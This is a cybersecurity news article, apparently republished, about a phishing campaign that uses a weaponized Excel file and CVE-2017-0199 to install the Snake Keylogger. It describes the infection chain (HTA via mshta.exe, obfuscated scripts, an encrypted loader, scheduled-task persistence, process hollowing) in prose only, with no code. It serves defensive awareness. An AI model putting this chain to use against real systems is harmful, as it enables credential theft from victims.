Researchers recently discovered a complex phishing campaign that exploits a .NET-based Snake Keylogger variant. This attack, which uses weaponized Excel documents to breach Windows systems, poses a significant threat to the security of user data. The campaign involves deceiving recipients through phishing emails that prompt them to open an Excel file named “swift copy.xls.”

Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is a malicious software that was initially distributed on hacker forums as a subscription-based service. This .NET-based malware is designed to steal sensitive data, including saved credentials from web browsers, clipboard content, and basic device information. Additionally, it can log keystrokes and capture screenshots, making it a powerful tool for cybercriminals.

Fortinet’s FortiGuard Labs reported that this attack starts with a phishing email that claims funds have been transferred into the recipient’s account. The email tricks recipients into opening the attached Excel file, which contains a specially crafted embedded link object that exploits the CVE-2017-0199 vulnerability to download additional malicious files. This covert process allows the malware to download an HTML Application (HTA) file, executed by the Windows application host (mshta.exe).

Once decoded, the HTA file reveals obfuscated JavaScript code that contains VBScript and PowerShell scripts. These scripts are responsible for downloading and executing the Snake Keylogger’s loader module. The downloaded executable file, the Loader module, is developed using the Microsoft .NET Framework and utilizes multiple-layer protection techniques, such as transformation and encryption, to avoid detection by cybersecurity products.

The Loader module extracts and decrypts several components from its resource section that are crucial for deploying the core Snake Keylogger module. The Deploy module, extracted from the Loader, ensures the persistence of the Snake Keylogger on the victim’s system by setting the Loader module file as hidden and read-only, creating a scheduled task in the system Task Scheduler to launch at startup, and performing process hollowing to hide malicious operations.

The Snake Keylogger attack underscores the evolving tactics of cybercriminals and the importance of robust cybersecurity measures. Users and organizations must remain vigilant by using updated antivirus software and being cautious with email attachments. Education and awareness are key in preventing sophisticated attacks from compromising sensitive data.

By understanding the mechanics of the attack and implementing proactive security measures, individuals and organizations can better protect themselves against this and similar cyber threats. The .NET-based Snake Keylogger attack via weaponized Excel documents represents a significant threat to Windows users, and it is crucial to stay informed and prepared to defend against such attacks.

Source link